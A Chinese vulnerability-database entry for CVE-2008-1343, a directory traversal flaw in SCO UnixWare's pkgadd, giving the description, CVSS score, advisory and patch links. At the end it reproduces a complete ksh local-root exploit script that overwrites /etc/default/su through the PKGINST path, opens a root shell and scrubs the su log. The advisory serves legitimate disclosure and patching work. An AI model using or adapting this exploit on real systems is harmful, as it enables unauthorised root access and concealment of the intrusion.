CVE-2008-1343 |
|
发布时间 :2008-03-17 12:44:00 | ||
修订时间 :2011-03-07 22:06:44 | ||||
NMCE |
[原文]Directory traversal vulnerability in (1) pkgadd and (2) pkgrm in SCO UnixWare 7.1.4 allows local users to gain privileges via unknown vectors.
[CNNVD]SCO UnixWare的pkgadd命令目录遍历漏洞(CNNVD-200803-236)
UnixWare是由SCO公司开发和维护的商业性质Unix操作系统。
SCO UnixWare在处理环境变量时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。
SCO UnixWare的pkgadd命令没有正确地过滤某个环境变量,如果本地用户在该命令中使用了目录遍历序列(如”../”)的话,就可以覆盖系统文件,获得权限提升。
–
CVSS (基础分值)
CVSS分值: | 4.9 | [中等(MEDIUM)] |
机密性影响: | NONE | [对系统的机密性无影响] |
完整性影响: | COMPLETE | [系统完整性可被完全破坏] |
可用性影响: | NONE | [对系统可用性无影响] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | LOCAL | [漏洞利用需要具有物理访问权限或本地帐户] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-22 | [对路径名的限制不恰当(路径遍历)] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
ftp://ftp.sco.com/pub/unixware7/714/security/p534589/p534589.txt (PATCH) SCO SCOSA-2008.1 |
http://xforce.iss.net/xforce/xfdb/41200 (UNKNOWN) XF sco-unixware-pkgadd-privilege-escalation(41200) |
http://www.vupen.com/english/advisories/2008/0871 (UNKNOWN) VUPEN ADV-2008-0871 |
http://www.securityfocus.com/bid/28236 (UNKNOWN) BID 28236 |
http://secunia.com/advisories/29370 (VENDOR_ADVISORY) SECUNIA 29370 |
–
漏洞信息
SCO UnixWare的pkgadd命令目录遍历漏洞 | |
中危 | 路径遍历 |
2008-03-17 00:00:00 | 2008-09-05 00:00:00 |
本地 | |
UnixWare是由SCO公司开发和维护的商业性质Unix操作系统。 SCO UnixWare在处理环境变量时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。 SCO UnixWare的pkgadd命令没有正确地过滤某个环境变量,如果本地用户在该命令中使用了目录遍历序列(如”../”)的话,就可以覆盖系统文件,获得权限提升。 |
–
公告与补丁
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接: http://www.sco.com/support/update/download/release.php?rid=324 |
–
漏洞信息 (5355)
SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit (EDBID:5355) | |
sco | local |
2008-04-04 | Verified |
0 | qaaz |
N/A |
[点击下载] |
#!/bin/ksh # # 04/2008: public release # SCO UnixWare < 7.1.4 p534589 # if [ `id -un` = 'root' ]; then grep -v " $1-root\$" /var/adm/sulog >su.log cp su.def /etc/default/su cp su.log /var/adm/sulog rm -f su.def su.log woot.log else echo "------------------------------------" echo " UnixWare pkgadd Local Root Exploit" echo " By qaaz" echo "------------------------------------" EVIL=`echo 'XX\nPROMPT=No\nXX'` cp /etc/default/su su.def ln -s /etc/default/su woot.log PKGINST=../../../..`pwd`/woot /usr/sbin/pkgadd "$EVIL" 1>/dev/null 2>&1 su root -c "$0 `id -un`; /bin/sh -i" fi # milw0rm.com [2008-04-04]